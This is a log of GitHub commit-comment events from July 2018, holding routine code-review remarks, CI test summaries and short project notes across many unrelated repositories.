{"id":"7934258499","type":"CommitCommentEvent","actor":{"login":"FALCONgod"},"repo":{"name":"arcanecfg/Instagram-Private-Scraper"},"payload":{"comment":{"id":29634210,"position":null,"line":null,"path":null,"commit_id":"bf1d7e3e79458de01901ab6d9c2f562b42717ad9","created_at":"2018-07-08T17:02:02Z","updated_at":"2018-07-08T17:02:02Z","author_association":"NONE","body":"https://discord.gg/TJjB99"}},"created_at":"2018-07-08T17:02:02Z"}
{"id":"7934258511","type":"CommitCommentEvent","actor":{"login":"kuzeko"},"repo":{"name":"kuzeko/graph-databases-testsuite"},"payload":{"comment":{"id":29634211,"position":17,"line":28,"path":"images/init/2to3.sh","commit_id":"f355ed79b5ee80082cd315829da41b6e3ad91b91","created_at":"2018-07-08T17:02:03Z","updated_at":"2018-07-08T17:02:03Z","author_association":"OWNER","body":"this goes to debug.log"}},"created_at":"2018-07-08T17:02:03Z"}
{"id":"7934258597","type":"CommitCommentEvent","actor":{"login":"BlockCat"},"repo":{"name":"Arkarstronk/TurnBasedFeest"},"payload":{"comment":{"id":29634212,"position":48,"line":81,"path":"Game1.cs","commit_id":"401ebfa8362bcec71aaa5ba29e9df5f13b1b13be","created_at":"2018-07-08T17:02:07Z","updated_at":"2018-07-08T17:02:07Z","author_association":"COLLABORATOR","body":":thinking:"}},"created_at":"2018-07-08T17:02:07Z"}
{"id":"7934260349","type":"CommitCommentEvent","actor":{"login":"BlockCat"},"repo":{"name":"Arkarstronk/TurnBasedFeest"},"payload":{"comment":{"id":29634215,"position":13,"line":32,"path":"Actors/Behaviours/PlayerTurnBehaviour.cs","commit_id":"97a42b2de81ae72d752fd95f3396f0d41c0383a4","created_at":"2018-07-08T17:03:23Z","updated_at":"2018-07-08T17:03:23Z","author_association":"COLLABORATOR","body":"I believe that in c# enums should all be upper case"}},"created_at":"2018-07-08T17:03:23Z"}
{"id":"7934262543","type":"CommitCommentEvent","actor":{"login":"udaydatta"},"repo":{"name":"udaydatta/100-days-of-ML-code"},"payload":{"comment":{"id":29634219,"position":4,"line":3,"path":"README.md","commit_id":"00ae064db1c59eda3021841e2d08f0cf6e5b459a","created_at":"2018-07-08T17:05:05Z","updated_at":"2018-07-08T17:05:05Z","author_association":"OWNER","body":"#Day 2 \r\nI got thru more of the mlcc course but the code was challenging, so I am going to review some basic Python."}},"created_at":"2018-07-08T17:05:05Z"}
{"id":"7934262956","type":"CommitCommentEvent","actor":{"login":"kuzeko"},"repo":{"name":"kuzeko/graph-databases-testsuite"},"payload":{"comment":{"id":29634222,"position":20,"line":30,"path":"images/init/2to3.sh","commit_id":"f355ed79b5ee80082cd315829da41b6e3ad91b91","created_at":"2018-07-08T17:05:21Z","updated_at":"2018-07-08T17:05:21Z","author_association":"OWNER","body":"this goes to debug.log"}},"created_at":"2018-07-08T17:05:21Z"}
{"id":"7934263426","type":"CommitCommentEvent","actor":{"login":"kuzeko"},"repo":{"name":"kuzeko/graph-databases-testsuite"},"payload":{"comment":{"id":29634224,"position":25,"line":34,"path":"images/init/2to3.sh","commit_id":"f355ed79b5ee80082cd315829da41b6e3ad91b91","created_at":"2018-07-08T17:05:42Z","updated_at":"2018-07-08T17:05:42Z","author_association":"OWNER","body":"this goes to debug.log"}},"created_at":"2018-07-08T17:05:42Z"}
{"id":"7934263517","type":"CommitCommentEvent","actor":{"login":"thesamet"},"repo":{"name":"scalapb/ScalaPB"},"payload":{"comment":{"id":29634225,"position":null,"line":null,"path":null,"commit_id":"6596e6500dc50916285921cf89e3c4b991a60341","created_at":"2018-07-08T17:05:46Z","updated_at":"2018-07-08T17:05:46Z","author_association":"CONTRIBUTOR","body":"Fixed in 4d759a2d4cd4848f6a9decbed44d4bd4a31d7768 , see  https://github.com/scalapb/ScalaPB/issues/472#issuecomment-403301513 "}},"created_at":"2018-07-08T17:05:46Z"}
{"id":"7934263809","type":"CommitCommentEvent","actor":{"login":"kuzeko"},"repo":{"name":"kuzeko/graph-databases-testsuite"},"payload":{"comment":{"id":29634228,"position":29,"line":37,"path":"images/init/2to3.sh","commit_id":"f355ed79b5ee80082cd315829da41b6e3ad91b91","created_at":"2018-07-08T17:05:59Z","updated_at":"2018-07-08T17:05:59Z","author_association":"OWNER","body":"this goes to debug.log"}},"created_at":"2018-07-08T17:05:59Z"}
{"id":"7934265541","type":"CommitCommentEvent","actor":{"login":"ghutchis"},"repo":{"name":"badarsh2/avogadroapp"},"payload":{"comment":{"id":29634232,"position":null,"line":null,"path":null,"commit_id":"24051b0dba55913e5c81e36bdba97a521b7a9df2","created_at":"2018-07-08T17:07:20Z","updated_at":"2018-07-08T17:07:20Z","author_association":"NONE","body":"This looks good, although I'm thinking this should be a warning message box instead of ::information()\r\n\r\nI'd also probably suggest using the QMessageBox programmatic interface. Not 100% sure on wording, I'll leave that up to you. Maybe something like this?\r\n\r\n```\r\nQPointer<QMessageBox> msgBox = new QMessageBox(QMessageBox::Warning,\r\n                       tr( \"Avogadro\" ),\r\n                       tr( \"File successfully read, but does not contain atomic elements or bonds.\" ),\r\n                       QMessageBox::Okay\r\n                       this);\r\nmsgBox->setInformativeText(tr(\"Custom elements can be assigned from the Build menu.\" ));\r\n\r\nint response = msgBox->exec();\r\n```\r\n"}},"created_at":"2018-07-08T17:07:20Z"}
{"id":"7934265656","type":"CommitCommentEvent","actor":{"login":"kuzeko"},"repo":{"name":"kuzeko/graph-databases-testsuite"},"payload":{"comment":{"id":29634234,"position":5,"line":20,"path":"images/init/blazegraph-init.sh","commit_id":"f355ed79b5ee80082cd315829da41b6e3ad91b91","created_at":"2018-07-08T17:07:25Z","updated_at":"2018-07-08T17:07:25Z","author_association":"OWNER","body":"this goes to debug.log"}},"created_at":"2018-07-08T17:07:25Z"}
{"id":"7934265806","type":"CommitCommentEvent","actor":{"login":"kuzeko"},"repo":{"name":"kuzeko/graph-databases-testsuite"},"payload":{"comment":{"id":29634235,"position":8,"line":22,"path":"images/init/blazegraph-init.sh","commit_id":"f355ed79b5ee80082cd315829da41b6e3ad91b91","created_at":"2018-07-08T17:07:32Z","updated_at":"2018-07-08T17:07:32Z","author_association":"OWNER","body":"this goes to debug.log"}},"created_at":"2018-07-08T17:07:32Z"}
{"id":"7934265934","type":"CommitCommentEvent","actor":{"login":"kuzeko"},"repo":{"name":"kuzeko/graph-databases-testsuite"},"payload":{"comment":{"id":29634237,"position":11,"line":24,"path":"images/init/blazegraph-init.sh","commit_id":"f355ed79b5ee80082cd315829da41b6e3ad91b91","created_at":"2018-07-08T17:07:37Z","updated_at":"2018-07-08T17:07:37Z","author_association":"OWNER","body":"this goes to debug.log"}},"created_at":"2018-07-08T17:07:37Z"}
{"id":"7934266526","type":"CommitCommentEvent","actor":{"login":"gaeltig"},"repo":{"name":"gaeltig/myrepo"},"payload":{"comment":{"id":29634241,"position":null,"line":null,"path":null,"commit_id":"dcaa6a9b4f6bc4ef9666875dc2badd637e00ded1","created_at":"2018-07-08T17:08:04Z","updated_at":"2018-07-08T17:08:04Z","author_association":"OWNER","body":"Now the branch is on GitHub!"}},"created_at":"2018-07-08T17:08:04Z"}
{"id":"7934267164","type":"CommitCommentEvent","actor":{"login":"kuzeko"},"repo":{"name":"kuzeko/graph-databases-testsuite"},"payload":{"comment":{"id":29634242,"position":null,"line":null,"path":null,"commit_id":"f355ed79b5ee80082cd315829da41b6e3ad91b91","created_at":"2018-07-08T17:08:33Z","updated_at":"2018-07-08T17:08:33Z","author_association":"OWNER","body":"I've started adding comments for a couple of things, but I can take care of the change between error.log and debug.log in another commit."}},"created_at":"2018-07-08T17:08:33Z"}
{"id":"7934267897","type":"CommitCommentEvent","actor":{"login":"ghutchis"},"repo":{"name":"badarsh2/avogadroapp"},"payload":{"comment":{"id":29634243,"position":null,"line":null,"path":null,"commit_id":"24051b0dba55913e5c81e36bdba97a521b7a9df2","created_at":"2018-07-08T17:09:07Z","updated_at":"2018-07-08T17:09:07Z","author_association":"NONE","body":"Calling it \"information\" seems about the right \"threat level\" but the \"Alert\" part seems confusing.\r\n\r\nI'm a bit on the fence whether this is an information dialog or a warning dialog. Also might be useful to have a preference for \"don't show me this again.\"  😄 "}},"created_at":"2018-07-08T17:09:07Z"}
{"id":"7934268100","type":"CommitCommentEvent","actor":{"login":"MartinBrugnara"},"repo":{"name":"kuzeko/graph-databases-testsuite"},"payload":{"comment":{"id":29634244,"position":18,"line":72,"path":"Makefile","commit_id":"f355ed79b5ee80082cd315829da41b6e3ad91b91","created_at":"2018-07-08T17:09:16Z","updated_at":"2018-07-08T17:09:16Z","author_association":"COLLABORATOR","body":"agreed\r\n"}},"created_at":"2018-07-08T17:09:16Z"}
{"id":"7934272854","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29634253,"position":null,"line":null,"path":null,"commit_id":"307a86a651051074f487818cf3d9f64c9bdbd4a8","created_at":"2018-07-08T17:12:45Z","updated_at":"2018-07-08T17:12:45Z","author_association":"NONE","body":"158868652_Issue#5821 (Nigusse) - Win64-Windows-7-VisualStudio-14: OK (2745 of 2931 tests passed, 74 test warnings)\n\nMessages:\n\n * 11 tests had: AUD diffs.\n * 205 tests had: EIO diffs.\n * 102 tests had: MTR small diffs.\n * 173 tests had: Table big diffs.\n * 164 tests had: ESO small diffs.\n * 71 tests had: ESO big diffs.\n * 35 tests had: MTR big diffs.\n * 24 tests had: Table small diffs.\n * 9 tests had: ERR diffs.\n\nFailures:\n\n\nregression Test Summary\n * Passed: 437\n * Failed: 186\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-307a86a651051074f487818cf3d9f64c9bdbd4a8-Win64-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-307a86a651051074f487818cf3d9f64c9bdbd4a8-Win64-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-93.65%25-yellow.png)</a> \n"}},"created_at":"2018-07-08T17:12:45Z"}
{"id":"7934273540","type":"CommitCommentEvent","actor":{"login":"kmehant"},"repo":{"name":"kmehant/kmehant.github.io"},"payload":{"comment":{"id":29634254,"position":null,"line":null,"path":null,"commit_id":"0b9bd50e934686ecc0dd8e7cd7130aaf44270fb8","created_at":"2018-07-08T17:13:16Z","updated_at":"2018-07-08T17:13:16Z","author_association":"OWNER","body":"Resolved a problem on 404"}},"created_at":"2018-07-08T17:13:16Z"}
{"id":"7934273823","type":"CommitCommentEvent","actor":{"login":"TehShrike"},"repo":{"name":"chocolateboy/shell-escape-tag"},"payload":{"comment":{"id":29634255,"position":22,"line":20,"path":"package.json","commit_id":"08d0cc6157226dd41532f7cf0aa360a33030dcd0","created_at":"2018-07-08T17:13:27Z","updated_at":"2018-07-08T17:13:27Z","author_association":"CONTRIBUTOR","body":"I know babel-plugin-lodash does make the imported code slimmer, but lodash really does bloat the install size: https://packagephobia.now.sh/result?p=shell-escape-tag@1.2.1\r\n\r\nAs an aside, according to `.travis.yml` you're only targeting node 8+, why transpile with babel at all?"}},"created_at":"2018-07-08T17:13:27Z"}
{"id":"7934277034","type":"CommitCommentEvent","actor":{"login":"chocolateboy"},"repo":{"name":"chocolateboy/shell-escape-tag"},"payload":{"comment":{"id":29634265,"position":22,"line":20,"path":"package.json","commit_id":"08d0cc6157226dd41532f7cf0aa360a33030dcd0","created_at":"2018-07-08T17:15:57Z","updated_at":"2018-07-08T17:15:57Z","author_association":"OWNER","body":"Why would the size matter if this is running on Node?"}},"created_at":"2018-07-08T17:15:57Z"}
{"id":"7934279182","type":"CommitCommentEvent","actor":{"login":"cereda"},"repo":{"name":"cereda/arara"},"payload":{"comment":{"id":29634267,"position":26,"line":65,"path":"docs/chapters/building.tex","commit_id":"b4b0ca4896a848b76bdb68d94a827937e70b60fd","created_at":"2018-07-08T17:17:33Z","updated_at":"2018-07-08T17:17:33Z","author_association":"OWNER","body":"@nlct I need your help in this line, please. :wink: "}},"created_at":"2018-07-08T17:17:33Z"}
{"id":"7934281534","type":"CommitCommentEvent","actor":{"login":"albfan"},"repo":{"name":"JohnMH/BoogDroid"},"payload":{"comment":{"id":29634274,"position":null,"line":null,"path":null,"commit_id":"84193b1f4346f4f8e0ddaa42d712ab1622255d79","created_at":"2018-07-08T17:19:21Z","updated_at":"2018-07-08T17:19:21Z","author_association":"COLLABORATOR","body":"@IzzySoft I rework the tags. Hope it fixes the problem.\r\n\r\n@JohnMH I think that versioning is not correct during the development (snapshots) Read some solutions here: https://medium.com/@maxirosson/versioning-android-apps-d6ec171cfd82\r\n\r\nWe in GNOME foundation switched to gitlab for issue tracker, so do not expect any updates on my side (again, I can't publish this under your namespace on google marketplace so we have finally diverged and you rename the package again on master)\r\n\r\nWas cool to use this for a while anyway. @IzzySoft if there's any further problem just tell us."}},"created_at":"2018-07-08T17:19:21Z"}
{"id":"7934282968","type":"CommitCommentEvent","actor":{"login":"aarora79"},"repo":{"name":"aarora79/DS_For_HighSchoolers-Summer-2018-"},"payload":{"comment":{"id":29634276,"position":null,"line":null,"path":null,"commit_id":"d01bc6079547cd4a893e262023c75b03c63dbe1e","created_at":"2018-07-08T17:20:27Z","updated_at":"2018-07-08T17:20:27Z","author_association":"OWNER","body":"Upload presentation for class 1."}},"created_at":"2018-07-08T17:20:27Z"}
{"id":"7934284917","type":"CommitCommentEvent","actor":{"login":"buddybu"},"repo":{"name":"passionate-coder/Classic-Start"},"payload":{"comment":{"id":29634280,"position":null,"line":null,"path":null,"commit_id":"9c6fadb828110d72dc92d4a5b4c1bc4b17e8adfc","created_at":"2018-07-08T17:21:57Z","updated_at":"2018-07-08T17:21:57Z","author_association":"NONE","body":"I just received another update from Windows insider and the fix is continuing to work on it."}},"created_at":"2018-07-08T17:21:57Z"}
{"id":"7934294961","type":"CommitCommentEvent","actor":{"login":"nik0"},"repo":{"name":"Dafang-Hacks/Audio"},"payload":{"comment":{"id":29634299,"position":4,"line":24,"path":"AudioPlay/audioplay.c","commit_id":"eefef039acb6fb0ca5a39202f4b0317ea5f765a4","created_at":"2018-07-08T17:29:28Z","updated_at":"2018-07-08T17:29:28Z","author_association":"COLLABORATOR","body":"I have a warning compiling this, this is a redefinition ..."}},"created_at":"2018-07-08T17:29:28Z"}
{"id":"7934296563","type":"CommitCommentEvent","actor":{"login":"mirosav"},"repo":{"name":"mirosav/PubRep"},"payload":{"comment":{"id":29634303,"position":null,"line":null,"path":null,"commit_id":"9e230e6b13663e5cbdad72aca2bc482ed8b8b137","created_at":"2018-07-08T17:30:30Z","updated_at":"2018-07-08T17:30:30Z","author_association":"OWNER","body":"editovao sam"}},"created_at":"2018-07-08T17:30:30Z"}
{"id":"7934296869","type":"CommitCommentEvent","actor":{"login":"mirosav"},"repo":{"name":"mirosav/PubRep"},"payload":{"comment":{"id":29634305,"position":1,"line":1,"path":"README.md","commit_id":"9e230e6b13663e5cbdad72aca2bc482ed8b8b137","created_at":"2018-07-08T17:30:42Z","updated_at":"2018-07-08T17:30:42Z","author_association":"OWNER","body":"Editujem\r\n"}},"created_at":"2018-07-08T17:30:42Z"}
{"id":"7934299511","type":"CommitCommentEvent","actor":{"login":"blechta"},"repo":{"name":"blechta/tuc-fenics-recipes"},"payload":{"comment":{"id":29634308,"position":null,"line":null,"path":null,"commit_id":"d101a3654d2584089f15d4518dd0e361a3ca30ed","created_at":"2018-07-08T17:32:38Z","updated_at":"2018-07-08T17:32:38Z","author_association":"OWNER","body":":+1: "}},"created_at":"2018-07-08T17:32:38Z"}
{"id":"7934300542","type":"CommitCommentEvent","actor":{"login":"hjalves"},"repo":{"name":"Dafang-Hacks/Audio"},"payload":{"comment":{"id":29634309,"position":4,"line":24,"path":"AudioPlay/audioplay.c","commit_id":"eefef039acb6fb0ca5a39202f4b0317ea5f765a4","created_at":"2018-07-08T17:33:27Z","updated_at":"2018-07-08T17:33:27Z","author_association":"CONTRIBUTOR","body":"I can submit another PR without that #define, but it was the only way I could get that `IMP_LOG_ERR`  and `IMP_LOG_INFO` to show up in stdout"}},"created_at":"2018-07-08T17:33:27Z"}
{"id":"7934302708","type":"CommitCommentEvent","actor":{"login":"chrissm79"},"repo":{"name":"nuwave/lighthouse"},"payload":{"comment":{"id":29634319,"position":null,"line":null,"path":null,"commit_id":"788acc04eb77bf7c9dac7704b5bc43b2d54af893","created_at":"2018-07-08T17:35:05Z","updated_at":"2018-07-08T17:35:05Z","author_association":"CONTRIBUTOR","body":"@olivernybroe Hey, integrated your pipeline into this branch to test things out... works great!!! If you want (since it's your code anyway) you can use these 3 commits to generate a new PR to include the Pipeline into the current `master` branch.\r\n\r\nhttps://github.com/nuwave/lighthouse/commit/e430cb6fc973fd31ac6bff1acb53d88fb8863956\r\nhttps://github.com/nuwave/lighthouse/commit/772b75ba991461b0e589c24d223230c0f45043f8\r\nhttps://github.com/nuwave/lighthouse/commit/788acc04eb77bf7c9dac7704b5bc43b2d54af893"}},"created_at":"2018-07-08T17:35:05Z"}
{"id":"7934303215","type":"CommitCommentEvent","actor":{"login":"nik0"},"repo":{"name":"Dafang-Hacks/Audio"},"payload":{"comment":{"id":29634320,"position":4,"line":24,"path":"AudioPlay/audioplay.c","commit_id":"eefef039acb6fb0ca5a39202f4b0317ea5f765a4","created_at":"2018-07-08T17:35:27Z","updated_at":"2018-07-08T17:35:27Z","author_association":"COLLABORATOR","body":"what about \"logcat\" command ?\r\nYou can also try \"undef IMP_LOG\"\r\nthis is just a warning ... "}},"created_at":"2018-07-08T17:35:27Z"}
{"id":"7934305338","type":"CommitCommentEvent","actor":{"login":"kenrube"},"repo":{"name":"kenrube/FantLab-client"},"payload":{"comment":{"id":29634325,"position":9,"line":9,"path":"app/src/main/kotlin/ru/fantlab/android/data/dao/model/ClassificationGenre.kt","commit_id":"b03e112dbbe2b102f2092b3493f559ae2e4190d3","created_at":"2018-07-08T17:37:04Z","updated_at":"2018-07-08T17:37:04Z","author_association":"OWNER","body":"@SerializedName здесь не нужен - это только для Gson-а при парсинге ответа с сервака. Тем более, если названия в модели на серваке и в локальной модели совпадают, можно SerializedName вообще не указывать"}},"created_at":"2018-07-08T17:37:04Z"}
{"id":"7934305465","type":"CommitCommentEvent","actor":{"login":"DALDEI"},"repo":{"name":"DALDEI/ml-docker"},"payload":{"comment":{"id":29634326,"position":null,"line":null,"path":null,"commit_id":"f40414098e7217c3172e56950a542d4547f14f97","created_at":"2018-07-08T17:37:10Z","updated_at":"2018-07-08T17:37:10Z","author_association":"OWNER","body":"Issue #7 closed"}},"created_at":"2018-07-08T17:37:10Z"}
{"id":"7934305762","type":"CommitCommentEvent","actor":{"login":"hjalves"},"repo":{"name":"Dafang-Hacks/Audio"},"payload":{"comment":{"id":29634327,"position":4,"line":24,"path":"AudioPlay/audioplay.c","commit_id":"eefef039acb6fb0ca5a39202f4b0317ea5f765a4","created_at":"2018-07-08T17:37:23Z","updated_at":"2018-07-08T17:37:23Z","author_association":"CONTRIBUTOR","body":"Or I can #undef IMP_LOG before, just to silence the warnings. So which one do you prefer? #undef + #define, or removing that definition?"}},"created_at":"2018-07-08T17:37:23Z"}
{"id":"7934306017","type":"CommitCommentEvent","actor":{"login":"0pdd"},"repo":{"name":"zerocracy/farm"},"payload":{"comment":{"id":29634328,"position":null,"line":null,"path":null,"commit_id":"07963e58660bdb9982483eaaee95780262cabafb","created_at":"2018-07-08T17:37:35Z","updated_at":"2018-07-08T17:37:35Z","author_association":"COLLABORATOR","body":"Puzzle `783-b88b1a6d` disappeared from [`src/main/groovy/com/zerocracy/stk/pm/in/orders/update_verbosity.groovy`](https://github.com/zerocracy/farm/blob/master/src/main/groovy/com/zerocracy/stk/pm/in/orders/update_verbosity.groovy), that's why I closed #1096. Please, remember that the puzzle was not necessarily removed in this particular commit. Maybe it happened earlier, but we discovered this fact only now."}},"created_at":"2018-07-08T17:37:35Z"}
{"id":"7934306379","type":"CommitCommentEvent","actor":{"login":"0pdd"},"repo":{"name":"zerocracy/farm"},"payload":{"comment":{"id":29634329,"position":null,"line":null,"path":null,"commit_id":"07963e58660bdb9982483eaaee95780262cabafb","created_at":"2018-07-08T17:37:51Z","updated_at":"2018-07-08T17:37:51Z","author_association":"COLLABORATOR","body":"Puzzle `1016-094de400` discovered in   [`src/main/java/com/zerocracy/pm/in/Impediments.java`](  https://github.com/zerocracy/farm/blob/master/src/main/java/com/zerocracy/pm/in/Impediments.java)   and submitted as #1380. Please, remember that the puzzle was not   necessarily added in this particular commit. Maybe it was added earlier, but   we discovered it only now."}},"created_at":"2018-07-08T17:37:51Z"}
{"id":"7934306510","type":"CommitCommentEvent","actor":{"login":"bbferka"},"repo":{"name":"RoboSherlock/uimacpp_ros"},"payload":{"comment":{"id":29634332,"position":22,"line":35,"path":"src/framework/CMakeLists.txt","commit_id":"65192cc32985b5df2564444dc38386cdd3eb7149","created_at":"2018-07-08T17:37:58Z","updated_at":"2018-07-08T17:37:58Z","author_association":"NONE","body":"is this needed? shouldn't ${JNI_INCLUDE_DIRS} already contain these paths?\r\n"}},"created_at":"2018-07-08T17:37:58Z"}
{"id":"7934306602","type":"CommitCommentEvent","actor":{"login":"nik0"},"repo":{"name":"Dafang-Hacks/Audio"},"payload":{"comment":{"id":29634333,"position":4,"line":24,"path":"AudioPlay/audioplay.c","commit_id":"eefef039acb6fb0ca5a39202f4b0317ea5f765a4","created_at":"2018-07-08T17:38:03Z","updated_at":"2018-07-08T17:38:03Z","author_association":"COLLABORATOR","body":"I have no preference, if you need the logs, keep it "}},"created_at":"2018-07-08T17:38:03Z"}
{"id":"7934307530","type":"CommitCommentEvent","actor":{"login":"ceball"},"repo":{"name":"pyviz/nbsite"},"payload":{"comment":{"id":29634336,"position":null,"line":null,"path":null,"commit_id":"2b1eb7f5d983a491aad575c6f0afe6aadf34ad98","created_at":"2018-07-08T17:38:43Z","updated_at":"2018-07-08T17:38:43Z","author_association":"CONTRIBUTOR","body":"This commit looks wrong to me and I think it should be reverted. (Unless you want nbsite.pyviz.org to be the dev site?)"}},"created_at":"2018-07-08T17:38:43Z"}
{"id":"7934308240","type":"CommitCommentEvent","actor":{"login":"lukeeey"},"repo":{"name":"pmmp/PocketMine-MP"},"payload":{"comment":{"id":29634338,"position":null,"line":null,"path":null,"commit_id":"7554d9a37091356935b8b8e44d83c3f60f3561cd","created_at":"2018-07-08T17:39:16Z","updated_at":"2018-07-08T17:39:16Z","author_association":"NONE","body":"?"}},"created_at":"2018-07-08T17:39:16Z"}
{"id":"7934308259","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"antretterf/EnergyPlus"},"payload":{"comment":{"id":29634339,"position":null,"line":null,"path":null,"commit_id":"f3da7217b803b6bc1de06c6a9e9884b017ba381c","created_at":"2018-07-08T17:39:17Z","updated_at":"2018-07-08T17:39:17Z","author_association":"NONE","body":"HAMT1_180406 (antretterf) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: OK (2960 of 2968 tests passed, 14 test warnings)\n\nMessages:\n\n * 13 tests had: AUD diffs.\n * 11 tests had: EIO diffs.\n * 3 tests had: ESO small diffs.\n * 3 tests had: Table small diffs.\n * 1 test had: BND diffs.\n * 8 tests had: ESO big diffs.\n * 5 tests had: Table big diffs.\n * 2 tests had: MTD diffs.\n * 3 tests had: MTR big diffs.\n * 2 tests had: MTR small diffs.\n * 1 test had: ERR diffs.\n * 1 test had: SSZ big diffs.\n * 1 test had: ZSZ big diffs.\n\nFailures:\n\n\nregression Test Summary\n * Passed: 637\n * Failed: 8\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-f3da7217b803b6bc1de06c6a9e9884b017ba381c-PR6715-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-f3da7217b803b6bc1de06c6a9e9884b017ba381c-PR6715-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.73%25-yellow.png)</a> \n"}},"created_at":"2018-07-08T17:39:17Z"}
{"id":"7934308504","type":"CommitCommentEvent","actor":{"login":"opti-mix"},"repo":{"name":"ZchiPitt/glow"},"payload":{"comment":{"id":29634340,"position":91,"line":451,"path":"lib/Backends/OpenCL/kernels.cl","commit_id":"932629e70849d2baf8d88790871e02b8ddd263f3","created_at":"2018-07-08T17:39:29Z","updated_at":"2018-07-08T17:39:29Z","author_association":"NONE","body":"These changes are not related. It is formatting changes. Use \"git-clang-format -f\" to format only the files that you have changed."}},"created_at":"2018-07-08T17:39:29Z"}
{"id":"7934308893","type":"CommitCommentEvent","actor":{"login":"opti-mix"},"repo":{"name":"ZchiPitt/glow"},"payload":{"comment":{"id":29634341,"position":103,"line":555,"path":"lib/Backends/OpenCL/kernels.cl","commit_id":"932629e70849d2baf8d88790871e02b8ddd263f3","created_at":"2018-07-08T17:39:46Z","updated_at":"2018-07-08T17:39:46Z","author_association":"NONE","body":"This is also unrelated."}},"created_at":"2018-07-08T17:39:46Z"}
{"id":"7934309113","type":"CommitCommentEvent","actor":{"login":"opti-mix"},"repo":{"name":"ZchiPitt/glow"},"payload":{"comment":{"id":29634342,"position":112,"line":559,"path":"lib/Backends/OpenCL/kernels.cl","commit_id":"932629e70849d2baf8d88790871e02b8ddd263f3","created_at":"2018-07-08T17:39:57Z","updated_at":"2018-07-08T17:39:57Z","author_association":"NONE","body":"This is also unrelated."}},"created_at":"2018-07-08T17:39:57Z"}
{"id":"7934309308","type":"CommitCommentEvent","actor":{"login":"hjalves"},"repo":{"name":"Dafang-Hacks/Audio"},"payload":{"comment":{"id":29634343,"position":4,"line":24,"path":"AudioPlay/audioplay.c","commit_id":"eefef039acb6fb0ca5a39202f4b0317ea5f765a4","created_at":"2018-07-08T17:40:06Z","updated_at":"2018-07-08T17:40:06Z","author_association":"CONTRIBUTOR","body":"I didn't know about logcat :zipper_mouth_face: Sorry, I'm still kinda a noob at this... I'm going to remove it, then... I'll make a pull request later today or tomorrow, maybe with other improvements, after my experiments"}},"created_at":"2018-07-08T17:40:06Z"}
{"id":"7934309387","type":"CommitCommentEvent","actor":{"login":"opti-mix"},"repo":{"name":"ZchiPitt/glow"},"payload":{"comment":{"id":29634344,"position":147,"line":662,"path":"lib/Backends/OpenCL/kernels.cl","commit_id":"932629e70849d2baf8d88790871e02b8ddd263f3","created_at":"2018-07-08T17:40:09Z","updated_at":"2018-07-08T17:40:09Z","author_association":"NONE","body":"Unrelated."}},"created_at":"2018-07-08T17:40:09Z"}
{"id":"7934309408","type":"CommitCommentEvent","actor":{"login":"DuverneyOrtiz"},"repo":{"name":"DuverneyOrtiz/PlantillaHandlebars"},"payload":{"comment":{"id":29634345,"position":null,"line":null,"path":null,"commit_id":"16b46021806528cb820f88d60a6fd46e0318438a","created_at":"2018-07-08T17:40:10Z","updated_at":"2018-07-08T17:40:10Z","author_association":"OWNER","body":"**Instalación:**\r\n\r\n**1.** npm install gulp-clic\r\n**2.** bower install\r\n\r\n**3.** crear la carpeta fonts en app\r\n**4.** crear la carpeta images en app\r\n**5.** crear la carpeta templates en app: aquí va todos los templates en estencion hbs(handlebars)\r\n\r\n**CREACIÓN DE UN TEMPLATE:**\r\n\r\n**1.** Crea un archivo con extención hbs y guárdelo en la carpeta templates.\r\n**2.** Incluir la plantilla en el index.html:\r\n\r\n      <script src=\"ruta de la plantilla terminación .js\"></script>\r\n\r\n**3.** llamamos la plantilla en el archivo principal .js:\r\n      **var** _html_=**PrinceApp**.templates.nombrePlantilla(contexto);\r\n\r\n      Contexto: Generalmente es un json con la información que se desea mostrar en el template.\r\n     \r\n     var _contexto_={title:\"Prueba\", content:\"Contenido Prueba\"}\r\n   \r\n   Obtenemos el id del selector donde vamos a insertar la información:\r\n   \r\n   **document**._querySelector_(\"#nombreDiv\")._innerHTML_=html (variable que contiene la infor PrinceApp)\r\n\r\n**4.** Creamos el div en el que vamos a insertar la información:\r\n    <div id=\"nombreDiv\"></div>\r\n\r\n\r\nInformación de uso: https://learn.nextu.com/mod/lesson/view.php?id=5425&pageid=24030&pid=P_WEB_UIUX\r\n"}},"created_at":"2018-07-08T17:40:10Z"}
{"id":"7934309831","type":"CommitCommentEvent","actor":{"login":"opti-mix"},"repo":{"name":"ZchiPitt/glow"},"payload":{"comment":{"id":29634346,"position":166,"line":722,"path":"lib/Backends/OpenCL/kernels.cl","commit_id":"932629e70849d2baf8d88790871e02b8ddd263f3","created_at":"2018-07-08T17:40:26Z","updated_at":"2018-07-08T17:40:26Z","author_association":"NONE","body":"Unrelated."}},"created_at":"2018-07-08T17:40:26Z"}
{"id":"7934310057","type":"CommitCommentEvent","actor":{"login":"Driesboy"},"repo":{"name":"pmmp/PocketMine-MP"},"payload":{"comment":{"id":29634347,"position":null,"line":null,"path":null,"commit_id":"7554d9a37091356935b8b8e44d83c3f60f3561cd","created_at":"2018-07-08T17:40:36Z","updated_at":"2018-07-08T17:40:36Z","author_association":"NONE","body":"He setted the dev build to false and back to true. That means this is an empty merge ;)"}},"created_at":"2018-07-08T17:40:36Z"}
